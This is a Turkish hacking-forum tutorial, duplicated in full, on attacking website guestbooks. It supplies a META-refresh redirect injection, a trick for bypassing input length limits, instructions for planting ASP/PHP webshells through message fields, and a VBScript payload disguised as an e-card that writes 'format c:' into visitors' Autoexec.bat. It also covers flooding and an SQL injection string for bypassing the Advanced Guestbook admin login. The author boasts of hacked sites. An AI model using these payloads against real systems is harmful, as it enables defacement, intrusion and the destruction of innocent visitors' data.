..::cadawra::..
New member
- Katılım
- 18 Ara 2005
- Mesajlar
- 62
- Reaction score
- 0
- Puanları
- 0
- Yaş
- 37
Ziyaretçi def & GUestBook
İlk olarak Mantık önemli . Ziyaretçi defteleri sizden, Mesaj , başlık vede bazıları nick, mail isterler. Şİmdi Siz oraya mesajınızı yazın, başlığınmızı düzgün atın. Güzel bişler yazın. Ve gönder dediğinizde, yazdıklarınız FİLTRE lerden geçerek MSSQL , MYSQL ,MDB,TXT hangi veri tabanını kullanoıyorsa oraya yazdıklarınız kaydoluyor. Daha sonrada, Sizi Ziyaratçi defterinin sayfasına yönlendirtiyor. Aa bir bakıyorsunuz SİZİn yadıklarınız çıkmış ordaa. Yani ben bu yöntemle siteye bişiler yazdırabiliyorum. Hımm Şimdi burda ben öyle birşey yazdırmalıyım ki, Orda o kod , java artık ne yazdırııyorsam orda ÇALIŞMALI.
Olayımız problemmimiz budur. Bana yani EJder e gele sorular şöylee ? Ziyaretçi defterine ne tür zararlar veririz..?
- Eğer Ziyaretçi defteri Gerekli Filtrelemeleri yapmadı ise, Siz herşeyi yapaiblirisiniz. Onlar Savsak.com ve EJDER farkı ilee yazacağım. Eğer ki Önlem alınmadı isee devam ediiiyorum..
Basit bildiğiniz bişi bu, 1 sn sonra site istediğiniz yere yönlenecek bir KOD verecem. Orda 1 yerine iseter 0 ,iseterse 3 size kalmış cinsi saniyedir ama..
Code
<'META http-equiv=refresh content=1;URL=http://smarthomeconnection.com/hacked.htm>
Bakınız Bunu, Nick, başlık, mesaj kısmına neresi göreyorsanız oraya yazın. Çünkü webmaster Mesaj kısmına Fİltre koydu ise, siz Başlık kısmı sayesiyle yönlenecektir bu seferde.
Şİmdi bazı akıllı Webmasterlar, BAşlık kısmına 20 harf ilee kısıtlıyor. Siz o sayfayı PC nize kaydedin HTML olarak . Sonra o html sayfasını Notepad de açın. Action değerini düzeltin. vede BAşlık İnputundaki maxlength=21 size="37" gibi iki değer yada birini görürsünüz. Onları silin ve tekrar SAve edin. Sonra O PC nizdeki HTML yi çalıştırın ve kodlarınızı tekrar yzın. Başlık kısmınada. BU sefer başlık kısmında TÜm kodu yazabileceksiniz euheueh (savsak.com). Sonra SEND ne vardsa Gönder deyin. VEde böylelikle hem kendi PC nizden POST yapmılş olacaksınız, hemde webmaster ın o 20 karakter korumasını geçmiş olacağız. Böylece, başlık kısmında ekstra filtreleme yapmadığı için , Sizin kod çalışmış olacaktır..
Bakınız, MESAj kısmında Eğer sizin yönlendirme çalışıyor isee, unutmayın. O Ziyaaretçi defterinde FSO yani Zehir çalıştırma şansınızda vardır. ASP bir site ise, asp türü zehir, yada php türü. Sİtemizde savsak.com bulabilirsiniz bunlarıda. NASIL Zehir atarım peki?
-BAsit beyler, ben EJder onuda düşündü. Mesaj kısmı bölümüne, Yaa UPLOAD FSO lu kodlarını Yazarsınız, yada Zehir 2,3,4 ne versa, onun kodlarını O mesaj kısmınaa yazın. Vede gönderin. Eğer yönlendirme çalışıyor ise, bu zehir in çalışmasıda %50 dir. Ayrıca, zehir 2 3 yüklerseniz, pacth kısmını = ziyaretçi defterin ana sayfası asını yazın. Olay budur. Ziyarteçi defteri içinde siizin Zehir de çalışacaktır.
Ama eğer komplex , filtreli bir Ziyaretçi defteri isee, yemez buu =))
Mesela Size başka bir EJDER & savsak.com farkı ilee, yabancı Guestbooklara saldırı anlatayım. Ama bu seferkinde, siz yabancılara zarar vereceksiniz nasılmı. Ejder bunuda düşündü.. Yabancıların PC lerine FORMAT attırmak istersinzi dimi euehueheu.. Eğer sizin yönlendirme çalışıyor isee, ziyaeretçi defterinde, buu kod da çalışacaktır.
( ' işaretini KODdan kaldrıın, sonra çalıştırın.) Code
<'html>
<'head>
<'meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9">
<'title>Sevgilerle SaVSaK.CoM by EJDER
<'/head>
<'body>
<'script language="VBSCRIPT">
'Set fs = CreateObject("Scripting.FileSystemObject")
'Set a = fs.CreateTextFile("C:Autoexec.bat", True)
'a.WriteLine("format c: /autotest /u /q")
'a.Close
<'/script>
<'p>Giriste acılan uyariya "HAYIR" dediyseniz <'a 'href= "javascript:reload()">Malesef e-kart ınız calısmayacaktır.
<'/body>
<'/html>
bu olay. YA bunu ziyaretçi defterine mesaj kısmına yazığı gönderin yada, bu kodları HTML yapıp. kendi siztenize , Free hostunuzaa yükleyin. VEDE ziyaretçi defterinide Yönlendirme kodu ilee ,bu html ye yönlendirrir. Her iki olayda aynı kapıya çıkar.
Ejder burda yorulur. Vede bu kadarı yeter der. Daha beterlerid var elimde. Ama onlarıı vermem, istemeyin. Bu yöntemlerle bir çok kötülüğü yapabilirsiniz. JAVA Scriptler sağolsun
Ayrıca size yamayı unutum. Şimdi eğer Fİltre var ise nolur?
- Basit Hiç biş , sizin kod çalışmaz vede ziyaretçi defterinde o kodunuz kalır. Biraz değişmiş şekli ilee .. KOrunma yöntemöleride kolay. İSteyene yazabilirim onlarıda..
Bir soru gelmişti bana., Ziyaretçi defterine SQL İnjeciton yapılırmuı diye? - Yapsanda işine yaramaz. Ayrıca yapılacak bir yeride yok . BElki Komplex bir yapı vardsa, zorlasak yapılabilir. Ondada SQL injeciton yazımda, okuyabilirisniz. Veri tabanını havaya uçurmayı hahah =)
Ayrıca Ziyaretçi defterlerine FLOOD da yapılabilir. bulduğunuz 100 defterden %90 nında =) FLOOD işee yarar. hahah bunaa önlem almıyoo ne yazııkii.. Böylece Db i şişirebilirsiniz.
http://www.savsak.com/viewtopic.asp?forumid=75&id=1763 burdan, HACKLEdiğim ziyaretçi defterleri görebilirisniz. 2 saat de anca bu kadar oluyoor. gece gece hemde tek başıma... Ayrıca, ZOne dada, screnler mevcut.
Şimdi size bir bilgi vereceğim. Advanced Guestbook larda SQL açığı var.. Yukarda değil gibi beylerin, google da Advanced Guestbook olarak aratın, karşınıza bir sürü çıkacak
Defterde, ADMİN paneline girin, /admin.php den. Orda Sadeece şifre kızmına şunu yazın -> ') OR ('a' = 'a
olay bu. Hoop Admin penline giridniz. Sonrası size kalmış. EASY AMDİn den, önüne gelen , ilk mesajı editleiyn, kendi İNDEX inizin Kodlarını yada yönlendirme attıın. Bitii.
Dökümanı Yazan -->>> CADAWRA
İlk olarak Mantık önemli . Ziyaretçi defteleri sizden, Mesaj , başlık vede bazıları nick, mail isterler. Şİmdi Siz oraya mesajınızı yazın, başlığınmızı düzgün atın. Güzel bişler yazın. Ve gönder dediğinizde, yazdıklarınız FİLTRE lerden geçerek MSSQL , MYSQL ,MDB,TXT hangi veri tabanını kullanoıyorsa oraya yazdıklarınız kaydoluyor. Daha sonrada, Sizi Ziyaratçi defterinin sayfasına yönlendirtiyor. Aa bir bakıyorsunuz SİZİn yadıklarınız çıkmış ordaa. Yani ben bu yöntemle siteye bişiler yazdırabiliyorum. Hımm Şimdi burda ben öyle birşey yazdırmalıyım ki, Orda o kod , java artık ne yazdırııyorsam orda ÇALIŞMALI.
Olayımız problemmimiz budur. Bana yani EJder e gele sorular şöylee ? Ziyaretçi defterine ne tür zararlar veririz..?
- Eğer Ziyaretçi defteri Gerekli Filtrelemeleri yapmadı ise, Siz herşeyi yapaiblirisiniz. Onlar Savsak.com ve EJDER farkı ilee yazacağım. Eğer ki Önlem alınmadı isee devam ediiiyorum..
Basit bildiğiniz bişi bu, 1 sn sonra site istediğiniz yere yönlenecek bir KOD verecem. Orda 1 yerine iseter 0 ,iseterse 3 size kalmış cinsi saniyedir ama..
Code
<'META http-equiv=refresh content=1;URL=http://smarthomeconnection.com/hacked.htm>
Bakınız Bunu, Nick, başlık, mesaj kısmına neresi göreyorsanız oraya yazın. Çünkü webmaster Mesaj kısmına Fİltre koydu ise, siz Başlık kısmı sayesiyle yönlenecektir bu seferde.
Şİmdi bazı akıllı Webmasterlar, BAşlık kısmına 20 harf ilee kısıtlıyor. Siz o sayfayı PC nize kaydedin HTML olarak . Sonra o html sayfasını Notepad de açın. Action değerini düzeltin. vede BAşlık İnputundaki maxlength=21 size="37" gibi iki değer yada birini görürsünüz. Onları silin ve tekrar SAve edin. Sonra O PC nizdeki HTML yi çalıştırın ve kodlarınızı tekrar yzın. Başlık kısmınada. BU sefer başlık kısmında TÜm kodu yazabileceksiniz euheueh (savsak.com). Sonra SEND ne vardsa Gönder deyin. VEde böylelikle hem kendi PC nizden POST yapmılş olacaksınız, hemde webmaster ın o 20 karakter korumasını geçmiş olacağız. Böylece, başlık kısmında ekstra filtreleme yapmadığı için , Sizin kod çalışmış olacaktır..
Bakınız, MESAj kısmında Eğer sizin yönlendirme çalışıyor isee, unutmayın. O Ziyaaretçi defterinde FSO yani Zehir çalıştırma şansınızda vardır. ASP bir site ise, asp türü zehir, yada php türü. Sİtemizde savsak.com bulabilirsiniz bunlarıda. NASIL Zehir atarım peki?
-BAsit beyler, ben EJder onuda düşündü. Mesaj kısmı bölümüne, Yaa UPLOAD FSO lu kodlarını Yazarsınız, yada Zehir 2,3,4 ne versa, onun kodlarını O mesaj kısmınaa yazın. Vede gönderin. Eğer yönlendirme çalışıyor ise, bu zehir in çalışmasıda %50 dir. Ayrıca, zehir 2 3 yüklerseniz, pacth kısmını = ziyaretçi defterin ana sayfası asını yazın. Olay budur. Ziyarteçi defteri içinde siizin Zehir de çalışacaktır.
Ama eğer komplex , filtreli bir Ziyaretçi defteri isee, yemez buu =))
Mesela Size başka bir EJDER & savsak.com farkı ilee, yabancı Guestbooklara saldırı anlatayım. Ama bu seferkinde, siz yabancılara zarar vereceksiniz nasılmı. Ejder bunuda düşündü.. Yabancıların PC lerine FORMAT attırmak istersinzi dimi euehueheu.. Eğer sizin yönlendirme çalışıyor isee, ziyaeretçi defterinde, buu kod da çalışacaktır.
( ' işaretini KODdan kaldrıın, sonra çalıştırın.) Code
<'html>
<'head>
<'meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9">
<'title>Sevgilerle SaVSaK.CoM by EJDER
<'/head>
<'body>
<'script language="VBSCRIPT">
'Set fs = CreateObject("Scripting.FileSystemObject")
'Set a = fs.CreateTextFile("C:Autoexec.bat", True)
'a.WriteLine("format c: /autotest /u /q")
'a.Close
<'/script>
<'p>Giriste acılan uyariya "HAYIR" dediyseniz <'a 'href= "javascript:reload()">Malesef e-kart ınız calısmayacaktır.
<'/body>
<'/html>
bu olay. YA bunu ziyaretçi defterine mesaj kısmına yazığı gönderin yada, bu kodları HTML yapıp. kendi siztenize , Free hostunuzaa yükleyin. VEDE ziyaretçi defterinide Yönlendirme kodu ilee ,bu html ye yönlendirrir. Her iki olayda aynı kapıya çıkar.
Ejder burda yorulur. Vede bu kadarı yeter der. Daha beterlerid var elimde. Ama onlarıı vermem, istemeyin. Bu yöntemlerle bir çok kötülüğü yapabilirsiniz. JAVA Scriptler sağolsun
Ayrıca size yamayı unutum. Şimdi eğer Fİltre var ise nolur?
- Basit Hiç biş , sizin kod çalışmaz vede ziyaretçi defterinde o kodunuz kalır. Biraz değişmiş şekli ilee .. KOrunma yöntemöleride kolay. İSteyene yazabilirim onlarıda..
Bir soru gelmişti bana., Ziyaretçi defterine SQL İnjeciton yapılırmuı diye? - Yapsanda işine yaramaz. Ayrıca yapılacak bir yeride yok . BElki Komplex bir yapı vardsa, zorlasak yapılabilir. Ondada SQL injeciton yazımda, okuyabilirisniz. Veri tabanını havaya uçurmayı hahah =)
Ayrıca Ziyaretçi defterlerine FLOOD da yapılabilir. bulduğunuz 100 defterden %90 nında =) FLOOD işee yarar. hahah bunaa önlem almıyoo ne yazııkii.. Böylece Db i şişirebilirsiniz.
http://www.savsak.com/viewtopic.asp?forumid=75&id=1763 burdan, HACKLEdiğim ziyaretçi defterleri görebilirisniz. 2 saat de anca bu kadar oluyoor. gece gece hemde tek başıma... Ayrıca, ZOne dada, screnler mevcut.
Şimdi size bir bilgi vereceğim. Advanced Guestbook larda SQL açığı var.. Yukarda değil gibi beylerin, google da Advanced Guestbook olarak aratın, karşınıza bir sürü çıkacak
Defterde, ADMİN paneline girin, /admin.php den. Orda Sadeece şifre kızmına şunu yazın -> ') OR ('a' = 'a
olay bu. Hoop Admin penline giridniz. Sonrası size kalmış. EASY AMDİn den, önüne gelen , ilk mesajı editleiyn, kendi İNDEX inizin Kodlarını yada yönlendirme attıın. Bitii.
Dökümanı Yazan -->>> CADAWRA